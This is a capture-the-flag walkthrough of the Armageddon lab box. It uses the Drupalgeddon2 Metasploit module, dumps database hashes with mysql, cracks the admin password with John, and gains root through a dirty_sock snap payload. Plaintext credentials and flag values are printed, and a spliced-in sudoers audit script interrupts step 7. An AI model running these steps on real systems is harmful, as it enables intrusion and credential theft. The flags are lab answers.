ARMAGEDDON WALKTHROUGH

1. Nmap Scan:

2. Gobuster Scan:


3. Then I went to each directory listed in the Gobuster scan. /sites includes settings.php, which contained the credentials of the database user.

Use the module exploit/unix/webapp/drupal_drupalgeddon2 in msfconsole to exploit the Drupal vulnerability. Set the appropriate options and run the exploit, and we get a meterpreter shell.

Username: drupaluser

Password: CQHEy@9M*m23gBVj

4. Then run the command:

mysql -u drupaluser -h localhost -p -D drupal -e 'select name,pass from users;'

Password: CQHEy@9M*m23gBVj

This returns the password hash of the admin user, brucetherealadmin.

5. Next, we create a simple hash.txt file on the desktop and paste the above hash into it. Then we use John the Ripper to crack it:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

And we get the password for the admin.

Username: brucetherealadmin

Password: booboo

6. Log in over SSH with these credentials and read user.txt.

User.txt: 56f8bc6377eca727f2283581c846c0df

7. Now let's find out what can be run as root.

So the user can install a snap with root privileges without needing the root password. We can therefore install the malicious snap obtained from here. It is installed as follows:
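As an added defender-side check (not part of the original walkthrough), the following Python audits sudoers-style rules for the misconfiguration this step relies on: a non-root account allowed to run a package installer such as snap install as root. The sudoers sample is constructed for illustration, not the box's real configuration.

```python
import re

# Constructed sample in sudoers syntax; not the box's real configuration.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
brucetherealadmin ALL=(ALL) NOPASSWD: /usr/bin/snap install *
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) /usr/bin/apt-get update   # left over from a rollout
"""

# user  host=(runas[:group])  [NOPASSWD:] cmd, cmd, ...
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$")

# Binaries that install software: running any of them as root lets the caller
# place arbitrary code on the system, so a rule like this is a root-equivalent grant.
PACKAGE_INSTALLERS = ("/usr/bin/snap", "/usr/bin/apt", "/usr/bin/apt-get",
                      "/usr/bin/dpkg", "/usr/bin/pip", "/usr/bin/pip3")

def audit_sudoers(text):
    """Return a list of findings, one per rule that lets a non-root user run an installer as root."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("who") == "root":
            continue
        runas_user = m.group("runas").split(":")[0]
        if runas_user not in ("ALL", "root"):        # only root-level grants matter here
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            nopasswd = cmd.startswith("NOPASSWD:")
            cmd = cmd.replace("NOPASSWD:", "", 1).strip()
            if cmd == "ALL":
                continue                              # full sudo for admins is a deliberate choice
            if any(cmd == b or cmd.startswith(b + " ") for b in PACKAGE_INSTALLERS):
                findings.append({"line": lineno, "user": m.group("who"), "cmd": cmd,
                                 "nopasswd": nopasswd,
                                 "risk": "package installer runnable as root: a crafted package gives root"})
    return findings

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']} -> {f['cmd']} (NOPASSWD={f['nopasswd']}): {f['risk']}")
```

On a real host, feed it the output of visudo -c -f or the contents of /etc/sudoers and /etc/sudoers.d/* rather than the sample.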

The above command is as follows:

python2 -c 'print "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" + "A"*4256 + "=="' | base64 -d > leet.snap

**Beware of the quote characters (" and '). If they are copied as curly quotes, Linux gives you an error.

8. Run sudo -i to get root privileges. Use dirty_sock as the password if asked.

Root.txt: 5578a4c7888a6ae9c08fee3480c97239

Thanks